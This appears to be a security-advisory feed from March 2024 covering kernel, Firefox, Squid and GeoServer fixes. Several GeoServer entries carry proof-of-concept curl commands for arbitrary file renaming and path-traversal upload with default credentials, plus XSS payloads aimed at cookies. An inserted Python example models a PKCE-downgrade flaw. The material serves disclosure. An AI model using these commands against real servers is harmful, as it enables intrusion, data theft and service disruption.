- https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29 (Fix for Parse Server 7 alpha)
- https://github.com/parse-community/parse-server/releases/tag/6.5.5 (Fix for Parse Server 6 LTS)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6HH7-46R2-VF29
19.03.2024 21:02:21ubuntu[USN-6681-4] Linux kernel (AWS) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-4
19.03.2024 17:27:23ubuntu[USN-6686-3] Linux kernel (Oracle) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-3
19.03.2024 16:49:49ubuntu[USN-6680-3] Linux kernel (AWS) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-3
19.03.2024 14:15:07alpinelinux[ALPINE:CVE-2023-5388] nss vulnerability[From CVE-2023-5388] NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5388
19.03.2024 02:00:00debian[DSA-5641-1] fontforgesecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5641-1
19.03.2024 02:00:00mozilla[MFSA-2024-12] Security Vulnerabilities fixed in Firefox 124 (high)
- CVE-2023-5388: NSS susceptible to timing attack against RSA decryption (moderate)
  NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data.
- CVE-2024-2605: Windows Error Reporter could be used as a Sandbox escape vector (high)
  An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.
- CVE-2024-2606: Mishandling of WASM register values (high)
  Passing invalid data could have led to invalid wasm values being created, such as arbitrary integers turning into pointer values.
- CVE-2024-2607: JIT code failed to save return registers on Armv7-A (high)
  Return registers were overwritten which could have allowed an attacker to execute arbitrary code. *Note:* This issue only affected Armv7-A systems. Other operating systems are unaffected.
- CVE-2024-2608: Integer overflow could have led to out of bounds write (high)
  `AppendEncodedAttributeValue()`, `ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write.
- CVE-2024-2609: Permission prompt input delay could expire when not in focus (moderate)
  The permission prompt input delay could have expired while the window is not in focus, which made the prompt vulnerable to clickjacking by malicious websites.
- CVE-2024-2610: Improper handling of html and body tags enabled CSP nonce leakage (moderate)
  Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies.
- CVE-2024-2611: Clickjacking vulnerability could have led to a user accidentally granting permissions (moderate)
  A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions.
- CVE-2024-2612: Self referencing object could have potentially led to a use-after-free (moderate)
  If an attacker could find a way to trigger a particular code path in `SafeRefPtr`, it could have triggered a crash or potentially be leveraged to achieve code execution.
- CVE-2024-2613: Improper handling of QUIC ACK frame data could have led to OOM (low)
  Data was not properly sanitized when decoding a QUIC ACK frame; this could have led to unrestricted memory consumption and a crash.
- CVE-2024-2614: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (high)
  Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-2615: Memory safety bugs fixed in Firefox 124 (critical)
  Memory safety bugs present in Firefox 123. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-12
19.03.2024 02:00:00mozilla[MFSA-2024-13] Security Vulnerabilities fixed in Firefox ESR 115.9 (high)
- CVE-2023-5388: NSS susceptible to timing attack against RSA decryption (moderate)
  NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data.
- CVE-2024-0743: Crash in NSS TLS method (high)
  An unchecked return value in TLS handshake code could have caused a potentially exploitable crash.
- CVE-2024-2605: Windows Error Reporter could be used as a Sandbox escape vector (high)
  An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.
- CVE-2024-2607: JIT code failed to save return registers on Armv7-A (high)
  Return registers were overwritten which could have allowed an attacker to execute arbitrary code. *Note:* This issue only affected Armv7-A systems. Other operating systems are unaffected.
- CVE-2024-2608: Integer overflow could have led to out of bounds write (high)
  `AppendEncodedAttributeValue()`, `ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write.
- CVE-2024-2610: Improper handling of html and body tags enabled CSP nonce leakage (moderate)
  Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies.
- CVE-2024-2611: Clickjacking vulnerability could have led to a user accidentally granting permissions (moderate)
  A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions.
- CVE-2024-2612: Self referencing object could have potentially led to a use-after-free (moderate)
  If an attacker could find a way to trigger a particular code path in `SafeRefPtr`, it could have triggered a crash or potentially be leveraged to achieve code execution.
- CVE-2024-2614: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (high)
  Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-2616: Improve handling of out-of-memory conditions in ICU (high)
  To harden ICU against exploitation, the behavior for out-of-memory conditions was changed to crash instead of attempt to continue.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-13
19.03.2024 02:00:00mozilla[MFSA-2024-14] Security Vulnerabilities fixed in Thunderbird 115.9 (high)In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-14
19.03.2024 02:00:00oraclelinux[ELSA-2024-12232] openssh security update (moderate)
[7.4p1-23.0.3_fips]
- Change Epoch from 1 to 10
- Enable fips KDF POST [Orabug: 32461750]
- Disable diffie-hellman-group-exchange-sha256 KEX FIPS method [Orabug: 32461739]
[7.4p1-23.0.3]
- add KEX_INITIAL flag [Orabug: 36160445]
- implement 'strict key exchange' [CVE-2023-48795][Orabug: 36160445]
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12232
19.03.2024 02:00:00redhat[RHSA-2024:1375] squid:4 security update (important)
Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.
Security Fix(es):
* squid: denial of service in HTTP header parser (CVE-2024-25617)
* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)
* squid: denial of service in HTTP request parsing (CVE-2023-50269)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1375
19.03.2024 02:00:00redhat[RHSA-2024:1376] squid security update (important)
Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.
Security Fix(es):
* squid: denial of service in HTTP header parser (CVE-2024-25617)
* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)
* squid: denial of service in HTTP request parsing (CVE-2023-50269)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1376
19.03.2024 02:00:00redhat[RHSA-2024:1431] ruby:3.1 security, bug fix, and enhancement update (moderate)
Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.
The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-28565)
Security Fix(es):
* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)
* ruby: ReDoS vulnerability in URI (CVE-2023-28755)
* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)
* ruby: ReDoS vulnerability in Time (CVE-2023-28756)
Bug Fix(es):
* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-28569)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1431
19.03.2024 02:00:00redhat[RHSA-2024:1427] libreoffice security update (important)
LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.
Security Fix(es):
* CVE-2023-6186 libreoffice: various flaws (JIRA:RHEL-20657)
* CVE-2023-6185 libreoffice: various flaws (JIRA:RHEL-20657)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1427
19.03.2024 01:57:25ubuntu[USN-6700-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6700-1
19.03.2024 01:43:16ubuntu[USN-6701-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-1
19.03.2024 01:07:09ubuntu[USN-6699-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6699-1
19.03.2024 01:12:42rubysec[RUBYSEC:ROTP-2024-28862] ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb files. (medium)
The Ruby One Time Password library (ROTP) is an open source library for generating and validating one time passwords. Affected versions had overly permissive default permissions. Users should patch to version 6.3.0. Users unable to patch may correct file permissions after installation.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ROTP-2024-28862
21.03.2024 09:00:00msrc[MS:CVE-2024-29057] Microsoft Edge (Chromium-based) Spoofing Vulnerability (unknown)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-29057
21.03.2024 00:30:12ubuntu[USN-6702-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6702-2
21.03.2024 00:11:52ubuntu[USN-6701-2] Linux kernel (GCP) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-2
20.03.2024 23:14:26slackware[SSA:2024-080-01] python3 (high)New python3 packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/python3-3.9.19-i586-1_slack15.0.txz: Upgraded.
  This update fixes security issues:
  bundled libexpat was updated to 2.6.0.
  zipfile is now protected from the "quoted-overlap" zipbomb.
  tempfile.TemporaryDirectory cleanup no longer dereferences symlinks when
  working around file system permission errors.
  For more information, see:
    https://pythoninsider.blogspot.com/2024/03/python-31014-3919-and-3819-is-now.html
    https://www.cve.org/CVERecord?id=CVE-2023-52425
    https://www.cve.org/CVERecord?id=CVE-2024-0450
    https://www.cve.org/CVERecord?id=CVE-2023-6597
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/python3-3.9.19-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/python3-3.9.19-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python3-3.9.19-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python3-3.9.19-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
7081105ba6776152ac3b7106f1d39b18 python3-3.9.19-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
473fbc6c3cf937f8f9839113ade8afa8 python3-3.9.19-x86_64-1_slack15.0.txz

Slackware -current package:
a59b0adbca9785605159767489cbe6e5 d/python3-3.9.19-i586-1.txz

Slackware x86_64 -current package:
3b7c17fff3d5f99e8cfae5880c8a8dbb d/python3-3.9.19-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg python3-3.9.19-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-080-01
20.03.2024 20:30:45ubuntu[USN-6707-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-1
20.03.2024 19:44:27ubuntu[USN-6706-1] Linux kernel (OEM) vulnerability (medium)The system could be made to crash under certain conditions.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6706-1
20.03.2024 19:09:04maven[MAVEN:GHSA-X637-X8P3-5P22] Improper Authentication in Spring Authorization Server (moderate)Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients. Specifically, an application is vulnerable when a Confidential Client uses PKCE for the Authorization Code Grant. An application is not vulnerable when a Public Client uses PKCE for the Authorization Code Grant.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X637-X8P3-5P22
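The advisory does not describe the Spring implementation, so what follows is a generic, added illustration (not Spring Authorization Server code) of what a PKCE downgrade for confidential clients means: the `code_challenge` that was bound to the authorization code is silently not enforced at the token endpoint because the client authenticated with its secret, so a code obtained without the verifier can still be redeemed. The client ids, the secret and the `bind_pkce_to_code` switch that selects the vulnerable or the correct behaviour are constructed for the example; the S256 transform is the one defined in RFC 7636.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed client registry for the example (ids and secret are made up).
CLIENTS = {
    "web-backend": {"confidential": True, "secret": "example-client-secret"},
    "browser-spa": {"confidential": False, "secret": None},
}


def s256_challenge(code_verifier):
    """RFC 7636 S256: BASE64URL(SHA256(ASCII(code_verifier))) without padding."""
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


class AuthorizationServer:
    """Minimal authorization-code + PKCE server. With bind_pkce_to_code=False it
    reproduces the downgrade: a confidential client that authenticated with its
    secret may redeem a PKCE-protected code without presenting a code_verifier."""

    def __init__(self, bind_pkce_to_code):
        self.bind_pkce_to_code = bind_pkce_to_code
        self._codes = {}  # code -> {"client_id", "challenge", "method"}

    def authorize(self, client_id, code_challenge=None, code_challenge_method="S256"):
        # Front channel: whatever challenge arrived with the authorization
        # request is recorded against the code that is issued.
        code = secrets.token_urlsafe(24)
        self._codes[code] = {"client_id": client_id, "challenge": code_challenge,
                             "method": code_challenge_method}
        return code

    def token(self, client_id, code, client_secret=None, code_verifier=None):
        client = CLIENTS.get(client_id)
        if client is None:
            return {"error": "invalid_client"}
        if client["confidential"] and not (
                client_secret and hmac.compare_digest(client_secret, client["secret"])):
            return {"error": "invalid_client"}
        record = self._codes.pop(code, None)  # codes are single use
        if record is None or record["client_id"] != client_id:
            return {"error": "invalid_grant"}
        challenge = record["challenge"]
        if challenge is None:
            # No PKCE at authorization time: tolerated for confidential clients
            # only (public clients must always use PKCE in this example).
            if not client["confidential"]:
                return {"error": "invalid_grant"}
            return {"access_token": secrets.token_urlsafe(16), "pkce_verified": False}
        if code_verifier is None:
            # The downgrade: client authentication is wrongly accepted as a
            # substitute for the verifier the code was bound to.
            if client["confidential"] and not self.bind_pkce_to_code:
                return {"access_token": secrets.token_urlsafe(16), "pkce_verified": False}
            return {"error": "invalid_grant"}
        if record["method"] == "S256":
            presented = s256_challenge(code_verifier)
        else:  # "plain"
            presented = code_verifier
        if not hmac.compare_digest(presented, challenge):
            return {"error": "invalid_grant"}
        return {"access_token": secrets.token_urlsafe(16), "pkce_verified": True}
```

The rule the fixed branch enforces is the one that matters in review: once a code has been issued against a `code_challenge`, the token request must carry a matching `code_verifier` whatever the client type, and client authentication never waives that check.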
20.03.2024 23:03:47maven[MAVEN:GHSA-88WC-FCJ9-Q3R9] GeoServer's GWC Demos Page vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://github.com/GeoWebCache/geowebcache/issues/1171
https://github.com/GeoWebCache/geowebcache/pull/1173
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-88WC-FCJ9-Q3R9
20.03.2024 23:03:48maven[MAVEN:GHSA-7X76-57FR-M5R5] GeoServer's MapML HTML Page vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the MapML HTML Page. The MapML extension must be installed, and access to the MapML HTML Page is available to all users although data security may limit users' ability to trigger the XSS.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11154
https://github.com/geoserver/geoserver/pull/7175
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7X76-57FR-M5R5
20.03.2024 23:03:52maven[MAVEN:GHSA-FCPM-HCHJ-MH72] GeoServer's WMS OpenLayers Format vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap OpenLayers Output Format. Access to the WMS OpenLayers Format is available to all users by default although data and service security may limit users' ability to trigger the XSS.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11153
https://github.com/geoserver/geoserver/pull/7174
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FCPM-HCHJ-MH72
20.03.2024 23:03:57maven[MAVEN:GHSA-56R3-F536-5GF7] GeoServer's GWC Seed Form vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator's browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default, and granting non-administrators access to this endpoint is not recommended.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://github.com/GeoWebCache/geowebcache/issues/1172
https://github.com/GeoWebCache/geowebcache/pull/1174
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-56R3-F536-5GF7
20.03.2024 23:03:58maven[MAVEN:GHSA-FG9V-56HW-G525] GeoServer's Simple SVG Renderer vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap SVG Output Format when the Simple SVG renderer is enabled. Access to the WMS SVG Format is available to all users by default although data and service security may limit users' ability to trigger the XSS.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11152
https://github.com/geoserver/geoserver/pull/7173
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FG9V-56HW-G525
20.03.2024 23:04:02maven[MAVEN:GHSA-9RFR-PF2X-G4XF] GeoServer's Style Publisher vulnerable to Stored Cross-Site Scripting (XSS) (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources or in a specially crafted datastore file that will execute in the context of another user's browser when viewed in the Style Publisher. Access to the Style Publisher is available to all users although data security may limit users' ability to trigger the XSS.
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11149
https://github.com/geoserver/geoserver/pull/7162
https://osgeo-org.atlassian.net/browse/GEOS-11155
https://github.com/geoserver/geoserver/pull/7181
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RFR-PF2X-G4XF
20.03.2024 23:04:07maven[MAVEN:GHSA-75M5-HH4R-Q9GX] GeoServer Arbitrary file renaming vulnerability in REST Coverage/Data Store API (moderate)
### Summary
An arbitrary file renaming vulnerability exists that enables an authenticated administrator with permissions to modify stores through the REST Coverage Store or Data Store API to rename arbitrary files and directories with a name that does not end in ".zip".
### Details
Store file uploads rename zip files to have a ".zip" extension if they don't already have one before unzipping the file. This is fine for the file and url upload methods, where the files will be in a specific subdirectory of the data directory, but when using the external upload method this allows arbitrary files and directories to be renamed.
### PoC
Coverage Store Example (workspace and store name are irrelevant and any valid coverage format can be used):
```bash
curl -XPUT -H"Content-Type:application/zip" -u"admin:geoserver" -d"/file/to/move" "http://localhost:8080/geoserver/rest/workspaces/a/coveragestores/b/external.geotiff"
```
Data Store Example (workspace and store name and data store format are irrelevant):
```bash
curl -XPUT -H"Content-Type:application/zip" -u"admin:geoserver" -d"/file/to/move" "http://localhost:8080/geoserver/rest/workspaces/a/datastores/b/external.c"
```
### Impact
Renaming GeoServer files will most likely result in a denial of service, either completely preventing GeoServer from running or effectively deleting specific resources (such as a workspace, layer or style). In some cases, renaming GeoServer files could revert to the default settings for that file, which could be relatively harmless (like removing contact information) or have more serious consequences (like allowing users to make OGC requests that the customized settings would have prevented them from making). The impact of renaming non-GeoServer files depends on the specific environment, although some sort of denial of service is a likely outcome.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11213
https://github.com/geoserver/geoserver/pull/7289
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-75M5-HH4R-Q9GX
20.03.2024 23:04:12maven[MAVEN:GHSA-FH7P-5F6G-VJ2W] Stored Cross-Site Scripting (XSS) vulnerability in GeoServer's REST Resources API (moderate)
### Summary
A stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources that will execute in the context of another administrator's browser when viewed in the REST Resources API. Access to the REST Resources API is limited to full administrators by default, and granting non-administrators access to this endpoint should be carefully considered as it may allow access to files containing sensitive information.
### Details
Upload a new Legend via the New Style page if the user has permissions for this. The file is not checked and is uploaded to the backend system. It can then be viewed directly by requesting it via the API, which serves the file in its raw format without sanitisation.
![image](https://user-images.githubusercontent.com/6471928/232732469-7dbf2776-5712-4c68-bd12-e2403c136a7c.png)
![image](https://user-images.githubusercontent.com/6471928/232732832-4fe2337f-9b28-41b1-9181-24abff4a6973.png)
### PoC
1. The user makes the following request to upload the file.
```
POST /geoserver/web/wicket/bookmarkable/org.geoserver.wms.web.data.StyleNewPage?11-1.IBehaviorListener.0-dialog-dialog-content-form-submit&wicket-ajax=true&wicket-ajax-baseurl=wicket%2Fbookmarkable%2Forg.geoserver.wms.web.data.StyleNewPage%3F11 HTTP/1.1
Host: geoserver:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------37957706701641834739220342753
Content-Length: 619
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------37957706701641834739220342753
Content-Disposition: form-data; name="id89_hf_0"

-----------------------------37957706701641834739220342753
Content-Disposition: form-data; name="userPanel:image"

-----------------------------37957706701641834739220342753
Content-Disposition: form-data; name="userPanel:upload"; filename="test.html"
Content-Type: text/html

<script>alert(document.cookie)</script>
-----------------------------37957706701641834739220342753
Content-Disposition: form-data; name="p::submit"

1
-----------------------------37957706701641834739220342753--
```
2. The file is uploaded to the backend system and is viewable via the API at /geoserver/rest/resource/styles, as per the screenshot above.
3. If an admin user views this file the JavaScript is executed, and this could be used to craft a payload to steal the user's cookies (as these do not currently use HttpOnly).
![image](https://user-images.githubusercontent.com/6471928/232733694-5a994b08-53e4-4cd0-a20e-ec8717537e26.png)
Alternatively, if the user has permissions to use the API to make PUT requests, they can directly upload malicious files with a request such as the one below (the Authorization header carries the admin:geoserver default credentials). This would be viewable in the same way as above.
```
PUT /geoserver/rest/resource/styles/test2.html HTTP/1.1
Host: geoserver:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46Z2Vvc2VydmVy
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/html
Content-Length: 29

<script>alert(1)</script>
```
### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
1. Perform any action within the application that the user can perform.
2. View any information that the user is able to view.
3. Modify any information that the user is able to modify.
4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11148
https://github.com/geoserver/geoserver/pull/7161
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FH7P-5F6G-VJ2W
20.03.2024 17:44:00maven[MAVEN:GHSA-9V5Q-2GWQ-Q9HQ] Arbitrary file upload vulnerability in GeoServer's REST Coverage Store API (high)
### Summary
An arbitrary file upload vulnerability exists that enables an authenticated administrator with permissions to modify coverage stores through the REST Coverage Store API to upload arbitrary file contents to arbitrary file locations, which can lead to remote code execution.
### Details
Coverage stores that are configured using relative paths use a GeoServer Resource implementation that has validation to prevent path traversal, but coverage stores that are configured using absolute paths use a different Resource implementation that does not prevent path traversal.
### PoC
Step 1 (create sample coverage store):
```bash
curl -vXPUT -H"Content-type:application/zip" -u"admin:geoserver" --data-binary @polyphemus.zip "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.imagemosaic"
```
Step 2 (switch store to absolute URL):
```bash
curl -vXPUT -H"Content-Type:application/xml" -u"admin:geoserver" -d"<coverageStore><url>file:///{absolute path to data directory}/data/sf/filewrite</url></coverageStore>" "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite"
```
Step 3 (upload arbitrary files):
```bash
curl -vH"Content-Type:" -u"admin:geoserver" --data-binary @file/to/upload "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.a?filename=../../../../../../../../../../file/to/write"
```
Steps 1 & 2 can be combined into a single POST REST call if local write access to anywhere on the file system that GeoServer can read is possible (e.g., the /tmp directory).
### Impact
This vulnerability can lead to executing arbitrary code. An administrator with limited privileges could also potentially exploit this to overwrite GeoServer security files and obtain full administrator privileges.
### References
https://osgeo-org.atlassian.net/browse/GEOS-11176
https://github.com/geoserver/geoserver/pull/7222
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9V5Q-2GWQ-Q9HQ
20.03.2024 17:44:09maven[MAVEN:GHSA-8G7V-VJRC-X4G5] GeoServer log file path traversal vulnerability (high)
### Impact
This vulnerability requires a GeoServer administrator with access to the admin console to misconfigure the **Global Settings** for **log file location** to an arbitrary location. This can be used to read files via the admin console **GeoServer Logs** page. It is also possible to achieve RCE or cause denial of service by overwriting key GeoServer files.
### Patches
As this issue requires GeoServer administrator access, often representing a trusted party, the vulnerability has not yet attracted a volunteer or resources. Interested parties are welcome to contact geoserver-security@lists.osgeo.org for recommendations on developing a fix.
### Workarounds
